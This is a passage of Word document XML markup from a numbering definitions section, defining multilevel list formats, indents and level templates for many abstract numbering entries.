    <w:lvl w:ilvl="0" w:tplc="38B4DDBC">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="17F4291C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="8B085056">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="5B0C6242">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="0B6216FA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C67AC97A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FB046586">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="52DE6DDA">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C86C5B82">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="113" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="66D7022A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="10140BAA"/>
    <w:lvl w:ilvl="0" w:tplc="0427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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6704449D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="67197114"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5F4C6394">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="B8EE04C4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="32BA91F6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="063EE632">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="A20C1C04">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="4DAC1F4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="E55A7024">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="7B806006">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="64D0FE8C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="116" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="67D35BF9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC20F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68746535"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3954C8F4"/>
    <w:lvl w:ilvl="0" w:tplc="D2EEAABC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7624D6C0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="39E2E4F4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="046C2610">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8E42ED14">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CB0AF060">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="5A9ECDDC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="F11E9798">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="494E83BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="118" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="68763EF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0AA45D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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6A4D5F92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5440A1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A9638A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5D527B7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AEB4E2E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F7A0538">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="959CF526">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="684821DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C2222A22">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AA76FFD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D004ADC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E4F8A798">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="121" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6AA92590"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC20F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6E1D1338"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="5D527B7C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AEB4E2E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7F7A0538">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="959CF526">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="684821DE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="C2222A22">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="AA76FFD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="D004ADC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="E4F8A798">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="123" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="6E423244"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="47563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6EA03045"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="F9F0F6F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FBCECDD2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="ABDC9CF2">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="66541C84">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="4F6AE884">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="CC86DC2A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="D814F110">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="91EEDA60">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="1C007970">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="125" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7299335C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94868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4D31C0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3D905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754B1D9D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="295E5BC2"/>
    <w:lvl w:ilvl="0" w:tplc="94920930">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:b/>
        <w:color w:val="auto"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D30CF90A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7C08CED0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="A1F6D5EC">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7DA0F44E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FC8081DC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="53123AB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="DC16E6D6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2E2C96BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="128" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7553386D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4000B678"/>
    <w:lvl w:ilvl="0" w:tplc="A508B76C">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="36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BF3052"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7A28C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79230A6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="96A82018">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="8EF6E096">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="7A52088C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="64D48FC8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="530ED186">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7D081A68">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="81E8005A">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="CBBA1C36">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C4B4A054">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="131" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="79CA0D0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84927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A6127FB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E5F48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A7A6D76"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="3CD64CEE">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A07C3490">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="D1B0EDC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="321CAB44">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="CB8C698C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="7F94C148">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="80BC110C">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5CBAC8BE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="C80E7910">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="134" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7AFF4CB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="46C8C1B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="upperLetter"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="1FB0FFC6">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="17904874">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FE20B1B8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="8898D4FA">
